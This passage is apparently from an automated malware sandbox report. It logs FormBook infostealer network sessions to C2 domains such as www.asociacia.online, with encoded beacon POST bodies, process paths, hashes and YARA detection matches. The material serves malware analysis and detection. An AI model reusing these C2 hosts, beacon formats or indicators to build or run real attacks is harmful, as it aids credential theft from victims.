                        Data Raw: 72 74 52 38 3d 2f 69 74 57 33 34 73 62 30 31 4c 6c 48 66 74 67 41 6d 35 6a 4c 79 4a 38 33 33 79 52 4e 54 37 45 37 47 49 6a 6b 4c 66 6d 72 6f 68 39 46 6b 39 71 31 69 46 6f 34 64 56 42 73 56 62 34 58 73 65 32 61 63 79 6c 54 76 55 5a 74 33 57 6e 44 6a 54 43 67 51 67 6f 69 31 71 50 32 71 71 74 75 65 78 52 6c 44 6b 53 41 54 43 51 52 33 7a 70 55 37 56 57 41 50 64 73 41 77 44 66 6e 4d 32 4f 36 49 6e 6e 41 45 36 4f 62 33 45 30 58 66 50 6e 75 46 6a 6b 66 4d 67 35 78 44 7a 64 43 65 69 72 6b 48 53 77 30 6f 74 52 77 75 6f 50 53 48 6f 76 32 4c 4b 53 37 47 48 54 31 53 35 51 62 77 63 6d 79 52 71 30 32 4a 4d 59 71 38 32 52 4e 46 73 43 75 71 47 59 43 5a 4f 42 65 74 39 51 49 67 67 37 54 4e 52 71 62 39 4b 47 6e 62 50 68 59 6c 76 64 67 38 47 54 42 78 38 5a 56 52 76 37 7a 30 79 53 74 43 36 4e 53 45 41 5a 75 71 71 52 62 36 4e 70 6c 6e 78 74 6d 64 6a 35 47 7a 52 49 31 72 70 32 74 77 56 67 70 74 4b 32 42 5a 42 45 43 59 6d 59 6f 65 30 39 64 6c 51 39 68 64 33 32 6d 4f 63 30 52 57 2b 45 56 72 65 63 49 75 4f 2b 73 38 45 45 49 [TRUNCATED]
                        Data Ascii: rtR8=/itW34sb01LlHftgAm5jLyJ833yRNT7E7GIjkLfmroh9Fk9q1iFo4dVBsVb4Xse2acylTvUZt3WnDjTCgQgoi1qP2qqtuexRlDkSATCQR3zpU7VWAPdsAwDfnM2O6InnAE6Ob3E0XfPnuFjkfMg5xDzdCeirkHSw0otRwuoPSHov2LKS7GHT1S5QbwcmyRq02JMYq82RNFsCuqGYCZOBet9QIgg7TNRqb9KGnbPhYlvdg8GTBx8ZVRv7z0yStC6NSEAZuqqRb6Nplnxtmdj5GzRI1rp2twVgptK2BZBECYmYoe09dlQ9hd32mOc0RW+EVrecIuO+s8EEIjQQvjNOJTbYLYni2e+I0IfQrGbaw8Fho6TY+jAIkD0fSlfy9TVGSpwgk9NwQ0UkBNgRG0n4jL7NA8nJ5YB70TtTBxj4j7RoIG4zgqT9O58vAKwQV8NUv8r2MXaKjfXNbQRvoSyHIANgupkycTPgYpI9ku5MVkwY8myPYyrsWriTxRfanS6bMNVvNSaL50XgaIKJJ/5UEcwIBt7jQTDclGptLFNqRIBh+s2CD8494tdU43rVyL8kUcvRxMTYHbdTFPh05JBgWLBUwx8O5pbqM6E4khP6XRU7/Fus+RuNnuXhq5UU9ZfClHMoCR5aR/4gCdkO2sYxrTv7nRNsdw1Jg+uYDxt8D/LTmcIlj73wHaWDUD7+PTctUZafj9qbT34VNZLIo8ilgwDcEccORojDBoZ1NK0zJKm3HV2UvJybxddaB3yDLHhHknDVAxu+XpwD9dEhEXSVASh/+ycULZU4MS985mzbsin1xEb7tPflr/1LKrtkbKqQRT2ey0HDE2IWlDURgF7o9SxcS2VuuKd8PR7WQdtiFiIn23oiHiQxYSIuLOnfhTzkveP/ewbDUVhLEvxV6hd9kE8A1O5hNhlxqe4qj08aa559qhjPTPvtv1iCRCAsVnUZe+y3e2/QhekRhvz/0v5PFfki7VUwVw9CnYtPNHrRAs/YWg+ [TRUNCATED]
                        Oct 9, 2024 12:43:44.039936066 CEST980INHTTP/1.1 404 Not Found
                        Date: Wed, 09 Oct 2024 10:43:43 GMT
                        Server: Apache
                        X-Frame-Options: SAMEORIGIN
                        Content-Length: 774
                        X-XSS-Protection: 1; mode=block
                        Connection: close
                        Content-Type: text/html
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        12192.168.2.650000199.192.21.169801588C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exe
                        TimestampBytes transferredDirectionData
                        Oct 9, 2024 12:43:45.992479086 CEST483OUTGET /d8cw/?rtR8=ygF20N1+ik7kBOtBXXgSSDl+0mvoPS6R8XEst5j0lvkfFXMCnxh1w4hdkVa8euGiR7K2W9wNoXO2NDH8py5opn2u7JXGpupl6T4qEm+uZVqNQYYUUMV8Z2PKg+70/6v6dkPbd3Q=&0Xm=T0UhHtW0dnoXGz2p HTTP/1.1
                        Host: www.zenscape.top
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-US
                        Connection: close
                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                        Oct 9, 2024 12:43:46.570646048 CEST995INHTTP/1.1 404 Not Found
                        Date: Wed, 09 Oct 2024 10:43:46 GMT
                        Server: Apache
                        X-Frame-Options: SAMEORIGIN
                        Content-Length: 774
                        X-XSS-Protection: 1; mode=block
                        Connection: close
                        Content-Type: text/html; charset=utf-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        13192.168.2.65000181.2.196.19801588C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exe
                        TimestampBytes transferredDirectionData
                        Oct 9, 2024 12:43:51.660274982 CEST746OUTPOST /jsqu/ HTTP/1.1
                        Host: www.asociacia.online
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-US
                        Accept-Encoding: gzip, deflate, br
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: no-cache
                        Connection: close
                        Content-Length: 209
                        Origin: http://www.asociacia.online
                        Referer: http://www.asociacia.online/jsqu/
                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                        Data Raw: 72 74 52 38 3d 75 34 68 6d 5a 66 74 6c 58 43 78 34 67 6a 38 6d 38 35 68 4d 76 4d 6d 47 7a 30 7a 4e 57 77 56 46 6c 77 33 48 47 30 45 53 6e 47 69 72 44 56 63 61 4e 5a 77 47 4c 4f 71 74 56 6c 63 56 44 70 35 79 52 48 7a 2b 2b 63 2f 37 51 73 4e 64 56 73 35 6d 49 4c 66 6c 4c 58 53 59 5a 59 48 41 62 45 68 6e 72 56 59 66 4d 55 74 49 49 44 77 7a 63 4f 31 49 6e 4e 48 72 6c 66 4b 38 34 39 61 39 49 34 39 68 4b 39 2f 78 39 61 55 6e 30 49 46 66 48 4d 72 37 67 2f 30 56 42 30 6d 76 61 50 5a 76 75 4c 4f 53 41 37 4c 76 2b 71 49 6e 4e 78 6a 39 32 68 54 75 64 52 59 49 79 4f 57 33 52 39 6a 4b 46 4c 75 50 39 38 57 33 76 77 47 50 47 4a 65 74
                        Data Ascii: rtR8=u4hmZftlXCx4gj8m85hMvMmGz0zNWwVFlw3HG0ESnGirDVcaNZwGLOqtVlcVDp5yRHz++c/7QsNdVs5mILflLXSYZYHAbEhnrVYfMUtIIDwzcO1InNHrlfK849a9I49hK9/x9aUn0IFfHMr7g/0VB0mvaPZvuLOSA7Lv+qInNxj92hTudRYIyOW3R9jKFLuP98W3vwGPGJet
                        Oct 9, 2024 12:43:52.321367979 CEST355INHTTP/1.1 404 Not Found
                        Server: nginx
                        Date: Wed, 09 Oct 2024 10:43:52 GMT
                        Content-Type: text/html
                        Transfer-Encoding: chunked
                        Connection: close
                        Content-Encoding: gzip
                        Data Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        14192.168.2.65000281.2.196.19801588C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exe
                        TimestampBytes transferredDirectionData
                        Oct 9, 2024 12:43:54.198178053 CEST770OUTPOST /jsqu/ HTTP/1.1
                        Host: www.asociacia.online
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-US
                        Accept-Encoding: gzip, deflate, br
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: no-cache
                        Connection: close
                        Content-Length: 233
                        Origin: http://www.asociacia.online
                        Referer: http://www.asociacia.online/jsqu/
                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                        Data Raw: 72 74 52 38 3d 75 34 68 6d 5a 66 74 6c 58 43 78 34 68 43 73 6d 7a 2b 4e 4d 6b 4d 6d 46 32 30 7a 4e 59 51 55 4d 6c 77 37 48 47 31 42 50 79 67 36 72 41 30 73 61 63 6f 77 47 59 2b 71 74 4e 56 63 51 4d 4a 35 35 52 48 50 4d 2b 64 54 37 51 74 70 64 56 70 56 6d 49 34 33 6b 5a 33 53 65 55 34 48 43 55 6b 68 6e 72 56 59 66 4d 55 49 6e 49 48 55 7a 64 2b 46 49 6e 76 76 73 37 50 4b 39 39 39 61 39 5a 6f 39 74 4b 39 2f 48 39 61 6c 4d 30 4f 42 66 48 4a 76 37 67 71 59 57 59 45 6d 74 46 66 59 36 6c 2b 72 72 49 34 53 7a 34 6f 55 44 54 67 76 70 7a 58 53 30 42 69 59 72 67 65 32 31 52 2f 37 34 46 72 75 6c 2f 38 75 33 39 6e 4b 6f 4a 39 37 4f 75 53 39 70 68 64 50 41 35 68 2f 37 37 52 33 67 67 70 31 30 72 51 3d 3d
                        Data Ascii: rtR8=u4hmZftlXCx4hCsmz+NMkMmF20zNYQUMlw7HG1BPyg6rA0sacowGY+qtNVcQMJ55RHPM+dT7QtpdVpVmI43kZ3SeU4HCUkhnrVYfMUInIHUzd+FInvvs7PK999a9Zo9tK9/H9alM0OBfHJv7gqYWYEmtFfY6l+rrI4Sz4oUDTgvpzXS0BiYrge21R/74Frul/8u39nKoJ97OuS9phdPA5h/77R3ggp10rQ==
                        Oct 9, 2024 12:43:54.850873947 CEST355INHTTP/1.1 404 Not Found
                        Server: nginx
                        Date: Wed, 09 Oct 2024 10:43:54 GMT
                        Content-Type: text/html
                        Transfer-Encoding: chunked
                        Connection: close
                        Content-Encoding: gzip
                        Data Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        15192.168.2.65000381.2.196.19801588C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exe
                        TimestampBytes transferredDirectionData
                        Oct 9, 2024 12:43:56.810240984 CEST1783OUTPOST /jsqu/ HTTP/1.1
                        Host: www.asociacia.online
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-US
                        Accept-Encoding: gzip, deflate, br
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: no-cache
                        Connection: close
                        Content-Length: 1245
                        Origin: http://www.asociacia.online
                        Referer: http://www.asociacia.online/jsqu/
                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                        Data Raw: 72 74 52 38 3d 75 34 68 6d 5a 66 74 6c 58 43 78 34 68 43 73 6d 7a 2b 4e 4d 6b 4d 6d 46 32 30 7a 4e 59 51 55 4d 6c 77 37 48 47 31 42 50 79 67 79 72 44 43 34 61 4f 37 49 47 4a 4f 71 74 54 6c 63 52 4d 4a 35 67 52 48 6e 79 2b 64 4f 4d 51 75 42 64 55 50 42 6d 4f 4e 4c 6b 41 48 53 65 4c 6f 48 48 62 45 68 32 72 55 30 41 4d 55 34 6e 49 48 55 7a 64 34 42 49 75 64 48 73 35 50 4b 38 34 39 61 50 49 34 39 42 4b 39 6e 58 39 65 34 33 31 2f 39 66 47 70 66 37 6c 59 67 57 51 45 6d 7a 47 66 5a 35 6c 2b 76 4b 49 37 32 2f 34 70 67 35 54 69 7a 70 33 42 6a 71 65 43 45 4b 2b 4d 71 76 4b 4f 6e 41 4e 38 65 75 7a 73 65 36 77 52 36 65 57 35 7a 61 75 69 6c 74 68 66 61 5a 73 7a 2f 47 38 31 61 52 72 34 6f 63 35 7a 36 5a 5a 49 33 57 57 38 4f 72 56 75 73 32 4e 72 35 52 6d 51 54 73 50 41 55 52 70 65 50 53 78 2f 45 4b 5a 71 6c 62 39 70 4a 30 2f 4c 4e 4d 79 6b 79 2b 67 37 63 51 4a 2b 6a 61 6d 39 5a 31 35 45 69 6b 57 35 59 44 56 5a 57 39 77 4e 6b 51 36 51 65 6d 74 65 55 62 75 4e 36 36 51 33 56 47 2f 54 37 45 63 33 33 57 67 39 2f 64 59 [TRUNCATED]
                        Data Ascii: rtR8=u4hmZftlXCx4hCsmz+NMkMmF20zNYQUMlw7HG1BPygyrDC4aO7IGJOqtTlcRMJ5gRHny+dOMQuBdUPBmONLkAHSeLoHHbEh2rU0AMU4nIHUzd4BIudHs5PK849aPI49BK9nX9e431/9fGpf7lYgWQEmzGfZ5l+vKI72/4pg5Tizp3BjqeCEK+MqvKOnAN8euzse6wR6eW5zauilthfaZsz/G81aRr4oc5z6ZZI3WW8OrVus2Nr5RmQTsPAURpePSx/EKZqlb9pJ0/LNMyky+g7cQJ+jam9Z15EikW5YDVZW9wNkQ6QemteUbuN66Q3VG/T7Ec33Wg9/dYmyOm0lZfEvyxATYHVm0zZ5ZUoyMEQzY2c0bd0Pj65/G0CaNyW28/o9wVVYjP2lMrD2DfqOIOY+F7JZBwOQokvY4HE3zuzElPRmzsJavPM6wx95X2v37CqE1bbXpE3FPTN+nO0MszDwPV7qDA0qXZKgyx3vmZKJwZsQ15dy4nQwR/7ZHmsIrktx1kXSL75vSDJE5ULtwqLD9buTuzwbe2hrcvcsGyR05bEOvgG8Zzr5HAXtDheK1PXIgHTx0MSmfMA0SDQkQAMnlMzLyoOstAdbA7p3zjc7BPFCCWHmUOi8836fLWC0U/EzWkQGXkCAUvO+5NPBTKnB9QDa15vGj0ignXCx0u6o5TZRqsJRF2sRJKASKhRuXK9zTexpa2t4duV/liiFvKlm91XWS/9LQ0JqbB0jl3nJc5Bat1DCpqIS2x2+/7wYX+rk1HLhPpgKjfSii3w+pHm0afwF/6ABYRlHMoAVRT+i+qEfD7R53vEMkFrck+fMinQt9glxQ/4cld8Fwjax+ynq7wn72lM1aj0bkfMw+UXLEB9hYWArR4S+pBdtUWVGwt//0HNrc1qccv4D6j7HYTVHH3Yp3h23PNXEbaGkRQMn2Mb0PzZqwoa/6R/npJ5pzMbMKCJwm6HlK6Pyd6CELtsdaCrTQrMgBMS5atD+ai+S0a8b [TRUNCATED]
                        Oct 9, 2024 12:43:57.481805086 CEST355INHTTP/1.1 404 Not Found
                        Server: nginx
                        Date: Wed, 09 Oct 2024 10:43:57 GMT
                        Content-Type: text/html
                        Transfer-Encoding: chunked
                        Connection: close
                        Content-Encoding: gzip
                        Data Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        16192.168.2.65000481.2.196.19801588C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exe
                        TimestampBytes transferredDirectionData
                        Oct 9, 2024 12:43:59.352420092 CEST487OUTGET /jsqu/?0Xm=T0UhHtW0dnoXGz2p&rtR8=j6JGavFFAQYaoSsk3MdZismLyTuecDBS/zrFTn0tpA7YEGIVc6EsUszyewNJDeJ1aRTf+dmReaRifudBLpLuEFCvWuSXUwpZ7h17BCkWHwRJfu54vPrIhvPMzvKdYKZDJ4eC1+o= HTTP/1.1
                        Host: www.asociacia.online
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-US
                        Connection: close
                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                        Oct 9, 2024 12:44:00.019073963 CEST691INHTTP/1.1 404 Not Found
                        Server: nginx
                        Date: Wed, 09 Oct 2024 10:43:59 GMT
                        Content-Type: text/html
                        Content-Length: 548
                        Connection: close
                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                        Click to jump to process

                        Click to jump to process

                        Click to dive into process behavior distribution

                        Click to jump to process

                        Target ID:0
                        Start time:06:41:54
                        Start date:09/10/2024
                        Path:C:\Users\user\Desktop\lPX6PixV4t.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\lPX6PixV4t.exe"
                        Imagebase:0x400000
                        File size:1'338'977 bytes
                        MD5 hash:1F52B1DEB6CBE7BFD6A5CF023069D858
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:2
                        Start time:06:41:58
                        Start date:09/10/2024
                        Path:C:\Windows\SysWOW64\svchost.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\lPX6PixV4t.exe"
                        Imagebase:0xc20000
                        File size:46'504 bytes
                        MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2563421707.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2563421707.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2563714383.0000000003690000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2563714383.0000000003690000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2564107647.0000000004800000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2564107647.0000000004800000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                        Reputation:high
                        Has exited:true

                        Target ID:7
                        Start time:06:42:32
                        Start date:09/10/2024
                        Path:C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exe"
                        Imagebase:0x4d0000
                        File size:140'800 bytes
                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3360961972.0000000002E00000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3360961972.0000000002E00000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                        Reputation:high
                        Has exited:false

                        Target ID:8
                        Start time:06:42:34
                        Start date:09/10/2024
                        Path:C:\Windows\SysWOW64\write.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\SysWOW64\write.exe"
                        Imagebase:0xd20000
                        File size:10'240 bytes
                        MD5 hash:3D6FDBA2878656FA9ECB81F6ECE45703
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3354933145.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3354933145.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
